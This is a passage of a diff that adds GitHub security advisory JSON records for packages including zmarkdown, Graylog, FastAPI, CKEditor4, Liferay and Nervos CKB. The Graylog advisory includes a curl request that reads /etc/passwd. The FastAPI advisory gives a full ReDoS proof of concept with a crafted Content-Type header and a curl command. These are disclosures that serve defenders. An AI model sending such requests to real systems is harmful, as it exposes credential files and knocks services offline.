"https://bugzilla.redhat.com/show_bug.cgi?id=2262284" + }, + { + "type": "PACKAGE", + "url": "https://github.com/yarnpkg/yarn" + }, + { + "type": "WEB", + "url": "https://github.com/yarnpkg/yarn/releases/tag/v1.22.13" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-426" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T20:20:29Z", + "nvd_published_at": "2024-02-04T20:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-mq6v-w35g-3c97/GHSA-mq6v-w35g-3c97.json b/advisories/github-reviewed/2024/02/GHSA-mq6v-w35g-3c97/GHSA-mq6v-w35g-3c97.json new file mode 100644 index 0000000000000..1f1bdcdc93406 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-mq6v-w35g-3c97/GHSA-mq6v-w35g-3c97.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mq6v-w35g-3c97", + "modified": "2024-02-03T00:37:56Z", + "published": "2024-02-03T00:37:56Z", + "aliases": [ + + ], + "summary": "Local File Inclusion vulnerability in zmarkdown", + "details": "### Impact\n\nA minor Local File Inclusion vulnerability has been found in\n`zmarkdown`, which allowed for images with a known path on\nthe host machine to be included inside a LaTeX document.\n\nTo prevent it, a new option has been created that allow to replace\ninvalid paths with a default image instead of linking the image on the\nhost directly. `zmarkdown` has been updated to make this setting the\ndefault.\n\nEvery user of `zmarkdown` is likely impacted, except if\ndisabling LaTeX generation or images download. Here\nis an example of including an image from an invalid path:\n\n```markdown\n![](/tmp/img.png)\n```\n\nWill effectively redownload and include the image\nfound at `/tmp/img.png`.\n\n### Patches\n\nThe vulnerability has been patched in version 10.1.3.\nIf impacted, you should update to this version as soon as possible.\n\n### Workarounds\n\nDisable images downloading, or sanitize paths.\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [ZMarkdown](https://github.com/zestedesavoir/zmarkdown/issues).\n", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "zmarkdown" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "10.1.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/zestedesavoir/zmarkdown/security/advisories/GHSA-mq6v-w35g-3c97" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:37:56Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-mqf8-4cqm-p83x/GHSA-mqf8-4cqm-p83x.json b/advisories/github-reviewed/2024/02/GHSA-mqf8-4cqm-p83x/GHSA-mqf8-4cqm-p83x.json new file mode 100644 index 0000000000000..8bd450bb34fa2 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-mqf8-4cqm-p83x/GHSA-mqf8-4cqm-p83x.json @@ -0,0 +1,99 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqf8-4cqm-p83x", + "modified": "2024-02-08T18:30:36Z", + "published": "2024-02-08T06:30:23Z", + "aliases": [ + "CVE-2024-25146" + ], + "summary": "Liferay Portal allows attackers to discover the existence of sites", + "details": "Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 18, and older unsupported versions returns with different responses depending on whether a site does not exist or if the user does not have permission to access the site, which allows remote attackers to discover the existence of sites by enumerating URLs. This vulnerability occurs if locale.prepend.friendly.url.style=2 and if a custom 404 page is used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.portal.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.4.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.3.0" + }, + { + "fixed": "7.3.10.u4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.2.10.fp18" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25146" + }, + { + "type": "PACKAGE", + "url": "https://github.com/liferay/liferay-portal" + }, + { + "type": "WEB", + "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25146" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-204" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:30:36Z", + "nvd_published_at": "2024-02-08T04:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-mw2c-vx6j-mg76/GHSA-mw2c-vx6j-mg76.json b/advisories/github-reviewed/2024/02/GHSA-mw2c-vx6j-mg76/GHSA-mw2c-vx6j-mg76.json new file mode 100644 index 0000000000000..1a70f159882c0 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-mw2c-vx6j-mg76/GHSA-mw2c-vx6j-mg76.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mw2c-vx6j-mg76", + "modified": "2024-02-07T20:24:12Z", + "published": "2024-02-07T17:31:34Z", + "aliases": [ + "CVE-2024-24816" + ], + "summary": "CKEditor4 Cross-site Scripting vulnerability in samples with enabled the preview feature", + "details": "### Affected packages\nThe vulnerability has been discovered in the samples that use the [preview](https://ckeditor.com/cke4/addon/preview) feature:\n\n* `samples/old/**/*.html`\n* `plugins/[plugin name]/samples/**/*.html`\n\nAll integrators that use these samples in the production code can be affected.\n\n### Impact\n\nA potential vulnerability has been discovered in one of CKEditor's 4 samples that are shipped with production code. The vulnerability allowed to execute JavaScript code by abusing the misconfigured [preview feature](https://ckeditor.com/cke4/addon/preview). It affects all users using the CKEditor 4 at version < 4.24.0-lts with affected samples used in a production environment.\n\n### Patches\nThe problem has been recognized and patched. The fix will be available in version 4.24.0-lts.\n\n### For more information\nEmail us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.\n\n### Acknowledgements\nThe CKEditor 4 team would like to thank Marcin Wyczechowski & Michał Majchrowicz AFINE Team for recognizing and reporting this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "ckeditor4" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.24.0-lts" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-mw2c-vx6j-mg76" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24816" + }, + { + "type": "WEB", + "url": "https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb" + }, + { + "type": "WEB", + "url": "https://ckeditor.com/cke4/addon/preview" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ckeditor/ckeditor4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T17:31:34Z", + "nvd_published_at": "2024-02-07T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-p6gg-5hf4-4rgj/GHSA-p6gg-5hf4-4rgj.json b/advisories/github-reviewed/2024/02/GHSA-p6gg-5hf4-4rgj/GHSA-p6gg-5hf4-4rgj.json new file mode 100644 index 0000000000000..d73b823a86e2c --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-p6gg-5hf4-4rgj/GHSA-p6gg-5hf4-4rgj.json @@ -0,0 +1,92 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p6gg-5hf4-4rgj", + "modified": "2024-02-07T20:24:28Z", + "published": "2024-02-07T18:23:43Z", + "aliases": [ + "CVE-2024-24824" + ], + "summary": "Graylog vulnerable to instantiation of arbitrary classes triggered by API request", + "details": "### Summary\n\nArbitrary classes can be loaded and instantiated using a HTTP PUT request to the `/api/system/cluster_config/` endpoint.\n\n### Details\n\nGraylog's cluster config system uses fully qualified class names as config keys. To validate the existence of the requested class before using them, Graylog loads the class using the class loader. \n\nhttps://github.com/Graylog2/graylog2-server/blob/e458db8bf4f789d4d19f1b37f0263f910c8d036c/graylog2-server/src/main/java/org/graylog2/rest/resources/system/ClusterConfigResource.java#L208-L214\n\n\n### PoC\nA request of the following form will output the content of the `/etc/passwd` file:\n\n```\ncurl -u admin: -X PUT http://localhost:9000/api/system/cluster_config/java.io.File \\\n -H \"Content-Type: application/json\" \\\n -H \"X-Requested-By: poc\" \\\n -d '\"/etc/passwd\"'\n```\n\nTo perform the request, authorization is required. Only users posessing the `clusterconfigentry:create` and `clusterconfigentry:edit` permissions are allowed to do so. These permissions are usually only granted to `Admin` users.\n\n### Impact\n\nIf a user with the appropriate permissions performs the request, arbitrary classes with 1-arg String constructors can be instantiated. \n\nThis will execute arbitrary code that is run during class instantiation.\n\nIn the specific use case of `java.io.File`, the behaviour of the internal web-server stack will lead to information exposure by including the entire file content in the response to the REST request.\n\n### Credits\n\nAnalysis provided by Fabian Yamaguchi - Whirly Labs (Pty) Ltd", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.graylog2:graylog2-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "5.1.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.graylog2:graylog2-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.2.0-alpha.1" + }, + { + "fixed": "5.2.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-p6gg-5hf4-4rgj" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24824" + }, + { + "type": "WEB", + "url": "https://github.com/Graylog2/graylog2-server/commit/75ef2b8d60e7d67f859b79fe712c8ae7b2e861d8" + }, + { + "type": "WEB", + "url": "https://github.com/Graylog2/graylog2-server/commit/7f8ef7fa8edf493106d5ef6f777d4da02c5194d9" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Graylog2/graylog2-server" + }, + { + "type": "WEB", + "url": "https://github.com/Graylog2/graylog2-server/blob/e458db8bf4f789d4d19f1b37f0263f910c8d036c/graylog2-server/src/main/java/org/graylog2/rest/resources/system/ClusterConfigResource.java#L208-L214" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T18:23:43Z", + "nvd_published_at": "2024-02-07T18:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-pm3m-32r3-7mfh/GHSA-pm3m-32r3-7mfh.json b/advisories/github-reviewed/2024/02/GHSA-pm3m-32r3-7mfh/GHSA-pm3m-32r3-7mfh.json new file mode 100644 index 0000000000000..24d6a2beebf4d --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-pm3m-32r3-7mfh/GHSA-pm3m-32r3-7mfh.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pm3m-32r3-7mfh", + "modified": "2024-02-03T00:03:07Z", + "published": "2024-02-03T00:03:07Z", + "aliases": [ + + ], + "summary": "Etcd embed auto compaction retention negative value causing a compaction loop or a crash", + "details": "### Impact\nData Validation\n\n### Detail\nThe parseCompactionRetention function in embed/etcd.go allows the retention variable value to be negative and causes the node to execute the history compaction in a loop, taking more CPU than usual and spamming logs.\n\n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0-rc.0" + }, + { + "fixed": "3.4.10" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.4.9" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.3.23" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-pm3m-32r3-7mfh" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:03:07Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-pr39-8257-fxc2/GHSA-pr39-8257-fxc2.json b/advisories/github-reviewed/2024/02/GHSA-pr39-8257-fxc2/GHSA-pr39-8257-fxc2.json new file mode 100644 index 0000000000000..1141f6c051d61 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-pr39-8257-fxc2/GHSA-pr39-8257-fxc2.json @@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pr39-8257-fxc2", + "modified": "2024-02-02T22:22:42Z", + "published": "2024-02-02T22:22:42Z", + "aliases": [ + + ], + "summary": "Nervos CKB DoS: Process exists when p2p discovery protocol receives unsupported peer IP", + "details": "The p2p discovery protocol assumes that the peer IP must be valid IPv4 address.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.34.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-pr39-8257-fxc2" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/d909cdebacc4747e972de4a7e5f19c8f79480361" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T22:22:42Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-q669-2vfg-cxcg/GHSA-q669-2vfg-cxcg.json b/advisories/github-reviewed/2024/02/GHSA-q669-2vfg-cxcg/GHSA-q669-2vfg-cxcg.json new file mode 100644 index 0000000000000..097c74f70368e --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-q669-2vfg-cxcg/GHSA-q669-2vfg-cxcg.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q669-2vfg-cxcg", + "modified": "2024-02-02T20:59:17Z", + "published": "2024-02-02T20:59:17Z", + "aliases": [ + + ], + "summary": "Nervos CKB Unaligned Pointer Dereference", + "details": "via bounty@nervos.org\n\nThere are multiple type conversions in ckb that unsafely cast between byte pointers and other types of pointers. This results in unaligned pointers, which are not allowed by the Rust language, and are considered undefined behavior, meaning that the compiler is free to do anything with code. This can lead to unpredictable bugs that can become security vulnerabilities.\n\nSome of the bugs here could potentially lead to buffer overreads in malformed data (it's not clear to me as I haven't investigated the practical impact of these bugs).\n\nTwo of these (in blockchain.rs) do not create unaligned data. They do though perform an unsafe operation that may not uphold the invariants of the safe function they are in, and could lead to undefined behavior and buffer overreads on malformed input.\n\nThese are of the same nature as those in my previous report about the molecule crate.\n\nPatch attached for commit 1b09e37c8e1b7945495cd18d9782417fbe51e986 that fixes all cases I know of at this time.\n\nPlease consider this report for reward under the terms of the bug bounty program.\n\nRelated advisory: https://github.com/nervosnetwork/molecule/security/advisories/GHSA-rffv-8x7x-p7pw", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.31.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.31.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-q669-2vfg-cxcg" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/adf8f0d08bc058383a0df658ea2c2ef6e7950335" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T20:59:17Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-q73f-w3h7-7wcc/GHSA-q73f-w3h7-7wcc.json b/advisories/github-reviewed/2024/02/GHSA-q73f-w3h7-7wcc/GHSA-q73f-w3h7-7wcc.json new file mode 100644 index 0000000000000..fdadfc65afb89 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-q73f-w3h7-7wcc/GHSA-q73f-w3h7-7wcc.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q73f-w3h7-7wcc", + "modified": "2024-02-03T00:18:13Z", + "published": "2024-02-03T00:18:13Z", + "aliases": [ + + ], + "summary": "Nervos CKB Transaction which calls syscall load_cell_data_hash has nondeterministic result", + "details": "### Impact\nTx-pool verify transaction which inputs' script contains `load_cell_data_hash` is nondeterministic\n\n\n### Workarounds\nEnforce tx-pool ResolvedTrascation inputs' load data is none.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.34.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.34.1" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-q73f-w3h7-7wcc" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/01eb5b2ecadf7e421b117d6c013e182978746e2f" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/fe83220905599e72c97878295f4769e91348d738" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/ff88b48779358e038209f3ac1bc1061e6f4deb13" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:18:13Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-qf9m-vfgh-m389/GHSA-qf9m-vfgh-m389.json b/advisories/github-reviewed/2024/02/GHSA-qf9m-vfgh-m389/GHSA-qf9m-vfgh-m389.json new file mode 100644 index 0000000000000..579a8c116f812 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-qf9m-vfgh-m389/GHSA-qf9m-vfgh-m389.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qf9m-vfgh-m389", + "modified": "2024-02-05T17:01:54Z", + "published": "2024-02-05T17:01:54Z", + "aliases": [ + "CVE-2024-24762" + ], + "summary": "FastAPI Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\nThis is also reported to Starlette at: https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\n\n### PoC\n\nCreate a FastAPI app that uses form data:\n\n```Python\n# main.py\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "fastapi" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.109.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.109.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24762" + }, + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/tiangolo/fastapi" + }, + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T17:01:54Z", + "nvd_published_at": "2024-02-05T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-qfv2-3p2f-vg48/GHSA-qfv2-3p2f-vg48.json b/advisories/github-reviewed/2024/02/GHSA-qfv2-3p2f-vg48/GHSA-qfv2-3p2f-vg48.json new file mode 100644 index 0000000000000..b437bca470fb1 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-qfv2-3p2f-vg48/GHSA-qfv2-3p2f-vg48.json @@ -0,0 +1,55 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qfv2-3p2f-vg48", + "modified": "2024-02-02T16:55:20Z", + "published": "2024-02-02T06:30:32Z", + "withdrawn": "2024-02-02T16:55:20Z", + "aliases": [ + + ], + "summary": "Duplicate Advisory: Central Dogma Authentication Bypass Vulnerability via Session Leakage", + "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-34q3-p352-c7q8. This link is maintained to preserve external references.\n\n## Original Description\nCentral Dogma versions prior to 0.64.0 is 